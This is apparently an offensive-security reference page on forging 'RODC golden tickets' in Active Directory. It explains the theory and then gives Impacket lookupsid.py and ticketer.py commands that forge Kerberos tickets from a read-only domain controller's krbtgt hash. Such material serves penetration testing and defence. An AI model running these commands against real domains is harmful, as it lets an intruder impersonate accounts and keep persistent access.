RODC Golden tickets
Theory
With administrative access to an RODC, it is possible to dump all the cached credentials, including those of thekrbtgt_XXXXX account. The hash can be used to forge a "RODC golden ticket" for any account in the msDS-RevealOnDemandGroup and not in the msDS-NeverRevealGroup attributes of the RODC. This ticket can be presented to the RODC or any accessible standard writable Domain Controller to request a Service Ticket (ST).
When presenting a RODC golden ticket to a writable (i.e. standard) Domain Controller, it is not worth crafting the PAC because it will be recalculated by the writable Domain Controller when issuing a service ticket (ST).
Practice
At the time of writing, 15th Apr. 2026, the pull request adding the -rodcNo flag in ticketer.py is pending.
There are Impacket scripts for each step of a golden ticket creation : retrieving the domain SID, creating the RODC golden ticket.
# Find the domain SID
lookupsid.py -hashes "ffffffffffffffffffffffffffffffff:$NT_HASH" "$DOMAIN/$USER@$DC_HOST" 0
# Create the RODC golden ticket (with an RC4 key, i.e. NT hash)
ticketer.py -nthash "$KRBTGT_NT_HASH" -domain-sid "$DOMAIN_SID" -domain "$DOMAIN" -rodcNo "$RODC_NUMBER" $USER
# Create the RODC golden ticket (with an AES 128/256bits key)
ticketer.py -aesKey "$KRBTGT_AES_KEY" -domain-sid "$DOMAIN_SID" -domain "$DOMAIN" -rodcNo "$RODC_NUMBER" $USER
# Create the RODC golden ticket (with an RC4 key, i.e. NT hash) with custom user/groups ids
ticketer.py -nthash "$KRBTGT_NT_HASH" -domain-sid "$DOMAIN_SID" -domain "$DOMAIN" -rodcNo "$RODC_NUMBER" -user-id "$USER_RID" -groups "$GROUPID1,$GROUPID2,..." $USERThe secret ingredient for making an RODC golden ticket viable is including the correct key version number in the kvno field of the ticket.
(Elad Shamir on specterops.io)